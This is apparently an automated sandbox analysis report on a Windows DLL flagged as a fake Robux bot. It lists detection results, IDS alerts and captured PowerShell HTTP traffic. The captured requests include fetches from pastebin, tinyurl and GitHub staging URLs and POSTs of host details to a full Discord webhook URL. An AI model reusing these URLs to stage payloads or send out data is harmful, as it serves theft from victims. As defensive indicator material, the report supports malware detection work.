2024-10-15T16:01:03.495587+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.7 | 52206 | 162.159.128.233 | 443 | TCP



AV Detection

Source: 5UIy3bo46y.dll | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 95.3% probability
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49753 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49755 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49770 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49769 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49771 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49768 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52050 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52049 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52102 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52104 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:52114 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:52125 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:52155 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:52167 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52203 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52206 version: TLS 1.2
Source: 5UIy3bo46y.dll | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ws\System.Management.Automation.pdbpdbj source: powershell.exe, 00000008.00000002.2164598925.000001851B744000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb089899H5 source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.2183326831.00000148CAFD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbw source: powershell.exe, 00000014.00000002.2364833973.000002152C5D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B63000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2197283163.00000148CB321000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbD source: powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb{Q source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb_7 source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbr source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000008.00000002.2184620731.000001851BA80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb, source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdb source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbX source: powershell.exe, 00000008.00000002.2164598925.000001851B744000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.PowerShell.Commands.Utility.pdbi source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbs source: powershell.exe, 00000014.00000002.2372611530.000002152C629000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B09000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2184620731.000001851BA80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2364833973.000002152C580000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8AB6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1774067227.000002476F732000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automationb.pdb&^ source: powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbg source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417120815.000001B76A18A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbX source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000014.00000002.2364833973.000002152C5FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 31bf3856ad364e35corlib.pdb;Q source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbl source: powershell.exe, 00000014.00000002.2372816905.000002152C62E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89) source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: 5UIy3bo46y.dll
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbr source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2183326831.00000148CAFD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B85000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2364833973.000002152C580000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb source: powershell.exe, 00000008.00000002.2184620731.000001851BB12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2195588775.00000148CB080000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb9 source: powershell.exe, 00000008.00000002.2164598925.000001851B744000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: agement.Automation.pdbi source: powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb? source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000007.00000002.1750975214.00000193E88BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000008.00000002.2184620731.000001851BB12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2183326831.00000148CAFD7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdb+Z source: powershell.exe, 00000009.00000002.2197283163.00000148CB230000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2164598925.000001851B75C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A1DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbM source: powershell.exe, 00000014.00000002.2364833973.000002152C5D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbT source: powershell.exe, 00000009.00000002.2183326831.00000148CAFD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb^A source: powershell.exe, 00000009.00000002.2197283163.00000148CB32F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb" source: powershell.exe, 00000007.00000002.1752473961.00000193E8AB6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb1 source: powershell.exe, 00000018.00000002.2408826051.000001B769F02000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbx source: powershell.exe, 00000014.00000002.2372816905.000002152C62E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb[ source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB30D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb{4 source: powershell.exe, 00000009.00000002.2197283163.00000148CB32F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbv source: powershell.exe, 00000014.00000002.2364833973.000002152C580000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB30D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2372816905.000002152C62E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb. source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: &C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: 5UIy3bo46y.dll
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb. source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbG source: powershell.exe, 0000000D.00000002.1783891772.000002476FA01000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ment.Automation.pdb! source: powershell.exe, 0000000D.00000002.1783891772.000002476FA7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbM source: powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089u source: powershell.exe, 00000008.00000002.2184620731.000001851BB12000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 56ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1783891772.000002476FA7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb!4Z source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb"fru source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp

Networking

Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:52050 -> 162.159.128.233:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:52049 -> 162.159.128.233:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:52104 -> 162.159.128.233:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:52102 -> 162.159.128.233:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:52203 -> 162.159.128.233:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:52206 -> 162.159.128.233:443
Source: unknown | DNS query: name: pastebin.com
Source: unknown | DNS query: name: tinyurl.com
Source: Joe Sandbox View | IP Address: 104.20.3.235
Source: Joe Sandbox View | IP Address: 185.199.109.133
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: FASTLYUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 302 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /yeykydun HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: tinyurl.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: time.windows.com
Source: global traffic | DNS traffic detected: DNS query: tinyurl.com
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: discord.com
Source: unknown | HTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 302 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:00:28 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729000830 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKHpiolfSBMOmhMVHMCKAAGkZ4L%2F6xtf%2FVEDsRBGlsW1e3%2Bnbj6rsjP5fip6jl%2BVRZLSXNeuydXw5a5zIi2A%2Fm4kMuUdiHesM2Z0v802QXta%2BC2YBtzrGoGQ7tKZ"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=48444a3424e72dbda7b42e0414b3a7ec1da5158a-1729000828; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=.tK.8_bM.IlqYQCskpMyBWYMJqLfcyu08rolf4Vi0ak-1729000828721-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d3055eabfe8463e-DFW
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:00:28 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 3 | x-ratelimit-reset: 1729000830 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eWkylGAmxKzDKJkj%2B7wLOdgBOts%2FMJuy3G3m0RU5XfXU4S9YAVZewPD4icofBcQK3HU9Py%2BRuuGsRw71Z5d%2F1Giz%2B1y4cNwI13zAbbcx4Svg84Tzzoax%2FDCGxOc3"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=48444a3424e72dbda7b42e0414b3a7ec1da5158a-1729000828; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=xSJuK64XEUQZUWANV0z1KgUnC_eADyp7hPkdEdtJkUU-1729000828724-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d3055ead8443ad3-DFW
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:00:38 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729000840 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cub%2FLRgLACco1CFNH9Q9AmckyywIt1%2BhfywRakNHRkEM%2Fk0UUVj7%2FB2NAytGN8ysw45uQ2cj0fepkrPy2yqV6AH0tjs9XplDLW62cRmyc3%2B5gvEA87fU%2FqhQFlEK"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=91e6537d835960c5dea5f6c908574570d8411595-1729000838; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=XRs7R23fkRnrXQRBTIVDR3Mx4Pp6hStSK7yD5KtZGmE-1729000838909-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d30562a7e982e66-DFW
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:00:38 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 3 | x-ratelimit-reset: 1729000840 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZqdOiyxqP9WV6kqIVh%2B5GCuOIqE00aCHn6eB40YB1BB9geKJipNhOdqwNJ2v6snbPVw1QCRaxAyACQI3aiUlPKUb5FN82%2FE91IyQ0mMwPxd4u4YjfM9OBY4SVQRZ"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=91e6537d835960c5dea5f6c908574570d8411595-1729000838; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=yEOotwkWt1dVal8F_cF0I.SDW0zDBw1WL7y6Ggktvek-1729000838959-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d30562adb78e76a-DFW
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:00:56 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729000858 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6y58N4G5xhAgAclsfELCL4vYMRL1dKLmEvZXbltV4xX19%2FhCtyXpYRGPBjcKQ5TtSYREctGH3loQD%2BPgaBAbSgrIHIQuhaS4fs00DsgobwUohjmmH%2BmdDlm2kXPO"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=d07a2d7a7b163eb2bc363103be6664bc28dedd8c-1729000856; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=Ocy6fJkJWJMC268ZWVFfxA560vcYtEIVLj3zT5Ch5e4-1729000856906-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d30569aef302e4f-DFW
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:01:03 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729000864 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8LReTUnDSklWN7n3iLQZ47m8pDvQX5LtLL8aaRSBCMArXkzeFEPdeyEIZYkR8FZknc4iaJ7BLYKWhcNSOWj1wHubkLuzLZuu6bRaQEdruclb7HAj2SnqHt5lz3i5"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=19b26d61e8d421bc0ea94327663eea862e775528-1729000863; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=sM1EwP2ChVVZeJ5tLOr_.50bQMwiRTG113ZViG8DWmM-1729000863431-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d3056c3cf0ae82f-DFW
Source: powershell.exe, 00000009.00000002.2197283163.00000148CB230000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cicro.com
